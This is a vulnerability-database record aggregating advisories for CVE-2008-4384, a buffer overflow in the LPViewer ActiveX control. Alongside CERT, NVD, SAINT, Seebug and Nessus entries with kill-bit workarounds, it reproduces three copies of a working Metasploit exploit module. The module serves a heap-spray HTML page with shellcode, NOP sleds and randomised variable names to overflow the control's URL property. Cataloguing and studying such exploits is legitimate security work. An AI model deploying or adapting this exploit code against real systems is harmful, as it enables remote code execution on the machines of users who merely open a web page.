The LPViewer ActiveX Control installs with the iseemedia ZOOM control viewer and allows viewing of images created with iseemedia software.
Problem
A buffer overflow vulnerability allows command execution when a user opens a web page which runs the LPViewer ActiveX Control with a long, specially crafted url property.
Exploit works on iseemedia Browser Plugin Viewer 3.6 and requires a user to open the exploit file in Internet Explorer.
Platforms
Windows
{"enchantments": {"score": {"value": 8.1, "vector": "NONE", "modified": "2016-10-03T15:01:56", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-4384"]}, {"type": "cert", "idList": ["VU:848873"]}, {"type": "seebug", "idList": ["SSV:4170"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/BROWSER/LPVIEWER_URL"]}, {"type": "exploitdb", "idList": ["EDB-ID:16571"]}, {"type": "saint", "idList": ["SAINT:25041479E7D3944631E9BAB1B0D891B8", "SAINT:C7562772402003F103F2D6EA21E2BDA4"]}, {"type": "nessus", "idList": ["LPVIEWER_ACTIVEX_OVERFLOWS.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:83104"]}], "modified": "2016-10-03T15:01:56", "rev": 2}, "vulnersScore": 8.1}, "reporter": "SAINT Corporation", "id": "SAINT:66112B6C7CF3B8CEB0B9B499657CAE25", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "published": "2008-11-21T00:00:00", "bulletinFamily": "exploit", "viewCount": 4, "modified": "2008-11-21T00:00:00", "references": [], "cvelist": ["CVE-2008-4384"], "description": "Added: 11/21/2008 \nCVE: [CVE-2008-4384](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4384>) \nBID: [31604](<http://www.securityfocus.com/bid/31604>) \nOSVDB: [48946](<http://www.osvdb.org/48946>) \n\n\n### Background\n\nThe LPViewer ActiveX Control installs with the iseemedia ZOOM control viewer and allows viewing of images created with iseemedia software. \n\n### Problem\n\nA buffer overflow vulnerability allows command execution when a user opens a web page which runs the LPViewer ActiveX Control with a long, specially crafted url property. \n\n### Resolution\n\nSet the kill bit for Class ID 3F0EECCE-E138-11D1-8712-0060083D83F5 as described in [Microsoft knowledge base article 240797](<http://support.microsoft.com/kb/240797>). \n\n### References\n\n<http://www.kb.cert.org/vuls/id/848873> \n\n\n### Limitations\n\nExploit works on iseemedia Browser Plugin Viewer 3.6 and requires a user to open the exploit file in Internet Explorer. \n\n### Platforms\n\nWindows \n \n\n", "type": "saint", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/lpviewer_url", "lastseen": "2016-10-03T15:01:56", "edition": 1, "title": "LPViewer ActiveX Control url property buffer overflow"}
{"cve": [{"lastseen": "2020-10-03T11:51:02", "description": "Multiple stack-based buffer overflows in MGI Software LPViewer ActiveX control (LPControl.dll), as acquired by Roxio and iseemedia, allow remote attackers to execute arbitrary code via the (1) url, (2) toolbar, and (3) enableZoomPastMax methods.", "edition": 3, "cvss3": {}, "published": "2008-10-07T20:00:00", "title": "CVE-2008-4384", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-4384"], "modified": "2017-08-08T01:32:00", "cpe": ["cpe:/a:mgi_software:lpviewer:*", "cpe:/a:roxio:lpviewer:*", "cpe:/a:iseemedia:lpviewer:*"], "id": "CVE-2008-4384", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4384", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:roxio:lpviewer:*:*:*:*:*:*:*:*", "cpe:2.3:a:mgi_software:lpviewer:*:*:*:*:*:*:*:*", "cpe:2.3:a:iseemedia:lpviewer:*:*:*:*:*:*:*:*"]}], "packetstorm": [{"lastseen": "2016-12-05T22:23:50", "description": "", "published": "2009-11-26T00:00:00", "type": "packetstorm", "title": "iseemedia / Roxio / MGI Software LPViewer ActiveX Control Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-4384"], "modified": "2009-11-26T00:00:00", "id": "PACKETSTORM:83104", "href": "https://packetstormsecurity.com/files/83104/iseemedia-Roxio-MGI-Software-LPViewer-ActiveX-Control-Buffer-Overflow.html", "sourceData": "`### \n## This file is part of the Metasploit Framework and may be subject to \n## redistribution and commercial restrictions. Please see the Metasploit \n## Framework web site for more information on licensing and terms of use. \n## http://metasploit.com/framework/ \n### \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::HttpServer::HTML \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'iseemedia / Roxio / MGI Software LPViewer ActiveX Control Buffer Overflow', \n'Description' => %q{ \nThis module exploits a stack overflow in LPViewer ActiveX control (LPControll.dll 3.2.0.2). When \nsending an overly long string to the URL() property an attacker may be able to execute arbitrary code. \n}, \n'License' => MSF_LICENSE, \n'Author' => [ 'MC' ], \n'Version' => '$Revision$', \n'References' => \n[ \n[ 'CVE', '2008-4384' ], \n[ 'OSVDB', '48946' ], \n[ 'US-CERT-VU', '848873' ], \n[ 'BID', '31604' ], \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n}, \n'Payload' => \n{ \n'Space' => 1024, \n'BadChars' => \"\\x00\", \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0C0C0C0C } ] \n], \n'DisclosureDate' => 'Oct 6 2008', \n'DefaultTarget' => 0)) \nend \n \ndef autofilter \nfalse \nend \n \ndef check_dependencies \nuse_zlib \nend \n \ndef on_request_uri(cli, request) \n# Re-generate the payload. \nreturn if ((p = regenerate_payload(cli)) == nil) \n \n# Encode the shellcode. \nshellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) \n \n# Create some nops. \nnops = Rex::Text.to_unescape(make_nops(4)) \n \n# Set the return. \nret = Rex::Text.uri_encode([target.ret].pack('L')) \n \n# Randomize the javascript variable names. \nvname = rand_text_alpha(rand(100) + 1) \nvar_i = rand_text_alpha(rand(30) + 2) \nrand1 = rand_text_alpha(rand(100) + 1) \nrand2 = rand_text_alpha(rand(100) + 1) \nrand3 = rand_text_alpha(rand(100) + 1) \nrand4 = rand_text_alpha(rand(100) + 1) \nrand5 = rand_text_alpha(rand(100) + 1) \nrand6 = rand_text_alpha(rand(100) + 1) \nrand7 = rand_text_alpha(rand(100) + 1) \nrand8 = rand_text_alpha(rand(100) + 1) \n \ncontent = %Q| \n<html> \n<head> \n<script> \ntry { \nvar #{vname} = new ActiveXObject('LPViewer.LPViewer.1'); \nvar #{rand1} = unescape('#{shellcode}'); \nvar #{rand2} = unescape('#{nops}'); \nvar #{rand3} = 20; \nvar #{rand4} = #{rand3} + #{rand1}.length; \nwhile (#{rand2}.length < #{rand4}) #{rand2} += #{rand2}; \nvar #{rand5} = #{rand2}.substring(0,#{rand4}); \nvar #{rand6} = #{rand2}.substring(0,#{rand2}.length - #{rand4}); \nwhile (#{rand6}.length + #{rand4} < 0x40000) #{rand6} = #{rand6} + #{rand6} + #{rand5}; \nvar #{rand7} = new Array(); \nfor (#{var_i} = 0; #{var_i} < 400; #{var_i}++){ #{rand7}[#{var_i}] = #{rand6} + #{rand1} } \nvar #{rand8} = \"\"; \nfor (#{var_i} = 0; #{var_i} < 1224; #{var_i}++) { #{rand8} = #{rand8} + unescape('#{ret}') } \n#{vname}.URL = #{rand8}; \n} catch( e ) { window.location = 'about:blank' ; } \n</script> \n</head> \n</html> \n| \n \ncontent = Rex::Text.randomize_space(content) \n \nprint_status(\"Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...\") \n \n# Transmit the response to the client \nsend_response_html(cli, content) \n \n# Handle the payload \nhandler(cli) \nend \n \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/83104/lpviewer_url.rb.txt"}], "saint": [{"lastseen": "2019-06-04T23:19:41", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-4384"], "description": "Added: 11/21/2008 \nCVE: [CVE-2008-4384](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4384>) \nBID: [31604](<http://www.securityfocus.com/bid/31604>) \nOSVDB: [48946](<http://www.osvdb.org/48946>) \n\n\n### Background\n\nThe LPViewer ActiveX Control installs with the iseemedia ZOOM control viewer and allows viewing of images created with iseemedia software. \n\n### Problem\n\nA buffer overflow vulnerability allows command execution when a user opens a web page which runs the LPViewer ActiveX Control with a long, specially crafted url property. \n\n### Resolution\n\nSet the kill bit for Class ID 3F0EECCE-E138-11D1-8712-0060083D83F5 as described in [Microsoft knowledge base article 240797](<http://support.microsoft.com/kb/240797>). \n\n### References\n\n<http://www.kb.cert.org/vuls/id/848873> \n\n\n### Limitations\n\nExploit works on iseemedia Browser Plugin Viewer 3.6 and requires a user to open the exploit file in Internet Explorer. \n\n### Platforms\n\nWindows \n \n\n", "edition": 4, "modified": "2008-11-21T00:00:00", "published": "2008-11-21T00:00:00", "id": "SAINT:C7562772402003F103F2D6EA21E2BDA4", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/lpviewer_url", "title": "LPViewer ActiveX Control url property buffer overflow", "type": "saint", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T17:19:56", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-4384"], "edition": 2, "description": "Added: 11/21/2008 \nCVE: [CVE-2008-4384](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4384>) \nBID: [31604](<http://www.securityfocus.com/bid/31604>) \nOSVDB: [48946](<http://www.osvdb.org/48946>) \n\n\n### Background\n\nThe LPViewer ActiveX Control installs with the iseemedia ZOOM control viewer and allows viewing of images created with iseemedia software. \n\n### Problem\n\nA buffer overflow vulnerability allows command execution when a user opens a web page which runs the LPViewer ActiveX Control with a long, specially crafted url property. \n\n### Resolution\n\nSet the kill bit for Class ID 3F0EECCE-E138-11D1-8712-0060083D83F5 as described in [Microsoft knowledge base article 240797](<http://support.microsoft.com/kb/240797>). \n\n### References\n\n<http://www.kb.cert.org/vuls/id/848873> \n\n\n### Limitations\n\nExploit works on iseemedia Browser Plugin Viewer 3.6 and requires a user to open the exploit file in Internet Explorer. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2008-11-21T00:00:00", "published": "2008-11-21T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/lpviewer_url", "id": "SAINT:25041479E7D3944631E9BAB1B0D891B8", "title": "LPViewer ActiveX Control url property buffer overflow", "type": "saint", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cert": [{"lastseen": "2020-09-18T20:42:24", "bulletinFamily": "info", "cvelist": ["CVE-2008-4384"], "description": "### Overview \n\nThe iseemedia LPViewer ActiveX control contains multiple stack buffer overflows, which can allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system.\n\n### Description \n\nThe iseemedia LPViewer ActiveX control, which is provided by the file `LPControl.dll`, is a component that was created by MGI Software. It was then acquired by Roxio, and then iseemedia after that. The LPViewer ActiveX control contains stack buffer overflows in the `url()`, `toolbar()`, and `enableZoomPastMax()` methods. \n \n--- \n \n### Impact \n\nBy convincing a user to view a specially crafted HTML document (e.g., a web page or an HTML email message or attachment), an attacker may be able to execute arbitrary code with the privileges of the user. The attacker could also cause Internet Explorer (or the program using the WebBrowser control) to crash. \n \n--- \n \n### Solution \n\nWe are currently unaware of a practical solution to this problem. Please consider the following workarounds: \n \n--- \n \n**Disable the LPViewer ActiveX control in Internet Explorer** \n \nThe vulnerable ActiveX control can be disabled in Internet Explorer by setting the kill bit for the following CLSID: \n \n`{3F0EECCE-E138-11D1-8712-0060083D83F5}` \nMore information about how to set the kill bit is available in [Microsoft Support Document 240797](<http://support.microsoft.com/kb/240797>). Alternatively, the following text can be saved as a `.REG` file and imported to set the kill bit for this control: \n \n`Windows Registry Editor Version 5.00` \n \n`[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\{3F0EECCE-E138-11D1-8712-0060083D83F5}]` \n`\"Compatibility Flags\"=dword:00000400` \n**Disable ActiveX** \n \nDisabling ActiveX controls in the Internet Zone (or any zone used by an attacker) appears to prevent exploitation of this and other ActiveX vulnerabilities. Instructions for disabling ActiveX in the Internet Zone can be found in the \"[Securing Your Web Browser](<http://www.us-cert.gov/reading_room/securing_browser/#Internet_Explorer>)\" document. \n \n--- \n \n### Vendor Information\n\n848873\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### MGI Software __ Affected\n\nUpdated: October 06, 2008 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease disable the vulnerable control.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23848873 Feedback>).\n\n### Roxio __ Affected\n\nNotified: June 18, 2007 Updated: October 06, 2008 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease disable the vulnerable control.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23848873 Feedback>).\n\n### iseemedia __ Affected\n\nNotified: August 22, 2008 Updated: October 06, 2008 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease disable the vulnerable control.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23848873 Feedback>).\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 0 | AV:--/AC:--/Au:--/C:--/I:--/A:-- \nTemporal | 0 | E:Not Defined (ND)/RL:Not Defined (ND)/RC:Not Defined (ND) \nEnvironmental | 0 | CDP:Not Defined (ND)/TD:Not Defined (ND)/CR:Not Defined (ND)/IR:Not Defined (ND)/AR:Not Defined (ND) \n \n \n\n\n### References \n\n * <http://support.microsoft.com/kb/240797>\n * <http://www.iseemedia.com/>\n\n### Acknowledgements\n\nThis vulnerability was reported by Will Dormann of the CERT/CC.\n\nThis document was written by Will Dormann.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2008-4384](<http://web.nvd.nist.gov/vuln/detail/CVE-2008-4384>) \n---|--- \n**Severity Metric:** | 1.82 \n**Date Public:** | 2008-10-06 \n**Date First Published:** | 2008-10-06 \n**Date Last Updated: ** | 2009-04-13 17:20 UTC \n**Document Revision: ** | 16 \n", "modified": "2009-04-13T17:20:00", "published": "2008-10-06T00:00:00", "id": "VU:848873", "href": "https://www.kb.cert.org/vuls/id/848873", "type": "cert", "title": "iseemedia / Roxio / MGI Software LPViewer ActiveX control stack buffer overflows", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-02-02T00:09:45", "description": "iseemedia / Roxio / MGI Software LPViewer ActiveX Control Buffer Overflow. CVE-2008-4384. Remote exploit for windows platform", "published": "2010-05-09T00:00:00", "type": "exploitdb", "title": "iseemedia / Roxio / MGI Software LPViewer ActiveX Control Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-4384"], "modified": "2010-05-09T00:00:00", "id": "EDB-ID:16571", "href": "https://www.exploit-db.com/exploits/16571/", "sourceData": "##\r\n# $Id: lpviewer_url.rb 9262 2010-05-09 17:45:00Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = NormalRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'iseemedia / Roxio / MGI Software LPViewer ActiveX Control Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a stack buffer overflow in LPViewer ActiveX control (LPControll.dll 3.2.0.2). When\r\n\t\t\t\tsending an overly long string to the URL() property an attacker may be able to execute arbitrary code.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' => [ 'MC' ],\r\n\t\t\t'Version' => '$Revision: 9262 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2008-4384' ],\r\n\t\t\t\t\t[ 'OSVDB', '48946' ],\r\n\t\t\t\t\t[ 'US-CERT-VU', '848873' ],\r\n\t\t\t\t\t[ 'BID', '31604' ],\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1024,\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0C0C0C0C } ]\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Oct 6 2008',\r\n\t\t\t'DefaultTarget' => 0))\r\n\tend\r\n\r\n\tdef autofilter\r\n\t\tfalse\r\n\tend\r\n\r\n\tdef check_dependencies\r\n\t\tuse_zlib\r\n\tend\r\n\r\n\tdef on_request_uri(cli, request)\r\n\t\t# Re-generate the payload.\r\n\t\treturn if ((p = regenerate_payload(cli)) == nil)\r\n\r\n\t\t# Encode the shellcode.\r\n\t\tshellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))\r\n\r\n\t\t# Create some nops.\r\n\t\tnops = Rex::Text.to_unescape(make_nops(4))\r\n\r\n\t\t# Set the return.\r\n\t\tret = Rex::Text.uri_encode([target.ret].pack('L'))\r\n\r\n\t\t# Randomize the javascript variable names.\r\n\t\tvname = rand_text_alpha(rand(100) + 1)\r\n\t\tvar_i = rand_text_alpha(rand(30) + 2)\r\n\t\trand1 = rand_text_alpha(rand(100) + 1)\r\n\t\trand2 = rand_text_alpha(rand(100) + 1)\r\n\t\trand3 = rand_text_alpha(rand(100) + 1)\r\n\t\trand4 = rand_text_alpha(rand(100) + 1)\r\n\t\trand5 = rand_text_alpha(rand(100) + 1)\r\n\t\trand6 = rand_text_alpha(rand(100) + 1)\r\n\t\trand7 = rand_text_alpha(rand(100) + 1)\r\n\t\trand8 = rand_text_alpha(rand(100) + 1)\r\n\r\n\t\tcontent = %Q|\r\n\t<html>\r\n\t<head>\r\n\t\t<script>\r\n\t\ttry {\r\n\t\t\tvar #{vname} = new ActiveXObject('LPViewer.LPViewer.1');\r\n\t\t\tvar #{rand1} = unescape('#{shellcode}');\r\n\t\t\tvar #{rand2} = unescape('#{nops}');\r\n\t\t\tvar #{rand3} = 20;\r\n\t\t\tvar #{rand4} = #{rand3} + #{rand1}.length;\r\n\t\t\twhile (#{rand2}.length < #{rand4}) #{rand2} += #{rand2};\r\n\t\t\tvar #{rand5} = #{rand2}.substring(0,#{rand4});\r\n\t\t\tvar #{rand6} = #{rand2}.substring(0,#{rand2}.length - #{rand4});\r\n\t\t\twhile (#{rand6}.length + #{rand4} < 0x40000) #{rand6} = #{rand6} + #{rand6} + #{rand5};\r\n\t\t\tvar #{rand7} = new Array();\r\n\t\t\tfor (#{var_i} = 0; #{var_i} < 400; #{var_i}++){ #{rand7}[#{var_i}] = #{rand6} + #{rand1} }\r\n\t\t\tvar #{rand8} = \"\";\r\n\t\t\tfor (#{var_i} = 0; #{var_i} < 1224; #{var_i}++) { #{rand8} = #{rand8} + unescape('#{ret}') }\r\n\t\t\t#{vname}.URL = #{rand8};\r\n\t\t\t} catch( e ) { window.location = 'about:blank' ; }\r\n\t\t</script>\r\n\t</head>\r\n\t</html>\r\n\t\t\t\t|\r\n\r\n\t\tcontent = Rex::Text.randomize_space(content)\r\n\r\n\t\tprint_status(\"Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...\")\r\n\r\n\t\t# Transmit the response to the client\r\n\t\tsend_response_html(cli, content)\r\n\r\n\t\t# Handle the payload\r\n\t\thandler(cli)\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16571/"}], "seebug": [{"lastseen": "2017-11-19T21:24:06", "description": "BUGTRAQ ID: 31604\r\nCVE ID\uff1aCVE-2008-4384\r\nCNCVE ID\uff1aCNCVE-20084384\r\n\r\niseemedia\u662f\u4e00\u6b3e\u56fe\u50cf\u5904\u7406\u8f6f\u4ef6\u3002\r\niseemedia LPViewer ActiveX\u63a7\u4ef6\u5b58\u5728\u591a\u4e2a\u57fa\u4e8e\u6808\u7684\u7f13\u51b2\u533a\u6ea2\u51fa\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528\u6f0f\u6d1e\u4ee5\u5e94\u7528\u7a0b\u5e8f\u6743\u9650\u6267\u884c\u4efb\u610f\u6307\u4ee4\u3002\r\nLPControl.dll\u6587\u4ef6\u63d0\u4f9b\u4e86iseemedia LPViewer ActiveX\u63a7\u4ef6\uff0c\u63a7\u4ef6\u5bf9url(), toolbar(), \u548cenableZoomPastMax()\u65b9\u6cd5\u5904\u7406\u7f3a\u5c11\u5145\u5206\u7684\u8fb9\u754c\u68c0\u67e5\uff0c\u6784\u5efa\u6076\u610fHTML\u6587\u6863\uff0c\u8bf1\u4f7f\u7528\u6237\u8bbf\u95ee\uff0c\u53ef\u5bfc\u81f4\u4ee5\u5e94\u7528\u7a0b\u5e8f\u6743\u9650\u6267\u884c\u4efb\u610f\u6307\u4ee4\u3002\n\niseemedia LPViewer\n \u53ef\u53c2\u8003\u5982\u4e0b\u4e34\u65f6\u89e3\u51b3\u65b9\u6848\uff1a\r\n\u7f16\u8f91\u5982\u4e0b\u6587\u672c\u5e76\u4fdd\u5b58\u4e3a\u4ee5.reg\u7ed3\u5c3e\u7684\u6587\u4ef6\u5e76\u53cc\u51fb\u5bfc\u5165\uff1a\r\nWindows Registry Editor Version 5.00\r\n[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\{3F0EECCE-E138-11D1-8712-0060083D83F5}]\r\n"Compatibility Flags"=dword:00000400\r\n\u76ee\u524d\u4f9b\u5e94\u5546\u6ca1\u6709\u89e3\u51b3\u65b9\u6848\u63d0\u4f9b\uff1a\r\n<a href=http://www.iseemedia.com/ target=_blank>http://www.iseemedia.com/</a>", "published": "2008-10-08T00:00:00", "type": "seebug", "title": "iseemedia 'LPControl.dll' LPViewer ActiveX\u63a7\u4ef6\u591a\u4e2a\u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-4384"], "modified": "2008-10-08T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-4170", "id": "SSV:4170", "sourceData": "", "sourceHref": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2020-05-26T22:14:17", "description": "This module exploits a stack buffer overflow in LPViewer ActiveX control (LPControll.dll 3.2.0.2). When sending an overly long string to the URL() property an attacker may be able to execute arbitrary code.\n", "published": "2008-10-14T13:41:52", "type": "metasploit", "title": "iseemedia / Roxio / MGI Software LPViewer ActiveX Control Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-4384"], "modified": "2017-10-05T21:44:36", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/LPVIEWER_URL", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'iseemedia / Roxio / MGI Software LPViewer ActiveX Control Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in LPViewer ActiveX control (LPControll.dll 3.2.0.2). When\n sending an overly long string to the URL() property an attacker may be able to execute arbitrary code.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'MC' ],\n 'References' =>\n [\n [ 'CVE', '2008-4384' ],\n [ 'OSVDB', '48946' ],\n [ 'US-CERT-VU', '848873' ],\n [ 'BID', '31604' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 1024,\n 'BadChars' => \"\\x00\",\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0C0C0C0C } ]\n ],\n 'DisclosureDate' => 'Oct 6 2008',\n 'DefaultTarget' => 0))\n end\n\n def autofilter\n false\n end\n\n def check_dependencies\n use_zlib\n end\n\n def on_request_uri(cli, request)\n # Re-generate the payload.\n return if ((p = regenerate_payload(cli)) == nil)\n\n # Encode the shellcode.\n shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))\n\n # Create some nops.\n nops = Rex::Text.to_unescape(make_nops(4))\n\n # Set the return.\n ret = Rex::Text.uri_encode([target.ret].pack('L'))\n\n # Randomize the javascript variable names.\n vname = rand_text_alpha(rand(100) + 1)\n var_i = rand_text_alpha(rand(30) + 2)\n rand1 = rand_text_alpha(rand(100) + 1)\n rand2 = rand_text_alpha(rand(100) + 1)\n rand3 = rand_text_alpha(rand(100) + 1)\n rand4 = rand_text_alpha(rand(100) + 1)\n rand5 = rand_text_alpha(rand(100) + 1)\n rand6 = rand_text_alpha(rand(100) + 1)\n rand7 = rand_text_alpha(rand(100) + 1)\n rand8 = rand_text_alpha(rand(100) + 1)\n\n content = %Q|\n <html>\n <head>\n <script>\n try {\n var #{vname} = new ActiveXObject('LPViewer.LPViewer.1');\n var #{rand1} = unescape('#{shellcode}');\n var #{randnop} = \"#{nops}\";\n var #{rand2} = unescape(#{randnop});\n var #{rand3} = 20;\n var #{rand4} = #{rand3} + #{rand1}.length;\n while (#{rand2}.length < #{rand4}) #{rand2} += #{rand2};\n var #{rand5} = #{rand2}.substring(0,#{rand4});\n var #{rand6} = #{rand2}.substring(0,#{rand2}.length - #{rand4});\n while (#{rand6}.length + #{rand4} < 0x40000) #{rand6} = #{rand6} + #{rand6} + #{rand5};\n var #{rand7} = new Array();\n for (#{var_i} = 0; #{var_i} < 400; #{var_i}++){ #{rand7}[#{var_i}] = #{rand6} + #{rand1} }\n var #{rand8} = \"\";\n for (#{var_i} = 0; #{var_i} < 1224; #{var_i}++) { #{rand8} = #{rand8} + unescape('#{ret}') }\n #{vname}.URL = #{rand8};\n } catch( e ) { window.location = 'about:blank' ; }\n </script>\n </head>\n </html>\n |\n\n content = Rex::Text.randomize_space(content)\n\n print_status(\"Sending #{self.name}\")\n\n # Transmit the response to the client\n send_response_html(cli, content)\n\n # Handle the payload\n handler(cli)\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/lpviewer_url.rb"}], "nessus": [{"lastseen": "2021-01-01T03:20:14", "description": "The remote host contains the LPViewer ActiveX control, initially\ncreated by MGI Software but later taken over by Roxio and then again\nby iseemedia.\n\nThis control reportedly has stack-based buffer overflows in its\n'url()', 'toolbar()', and 'enableZoomPastMax()' methods. If an\nattacker can trick a user on the affected host into viewing a\nspecially crafted HTML document, he can leverage these issues to\nexecute arbitrary code on the affected system subject to the user's\nprivileges.", "edition": 24, "published": "2008-10-22T00:00:00", "title": "LPViewer ActiveX Control Multiple Buffer Overflow Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-4384"], "modified": "2021-01-02T00:00:00", "cpe": [], "id": "LPVIEWER_ACTIVEX_OVERFLOWS.NASL", "href": "https://www.tenable.com/plugins/nessus/34472", "sourceData": 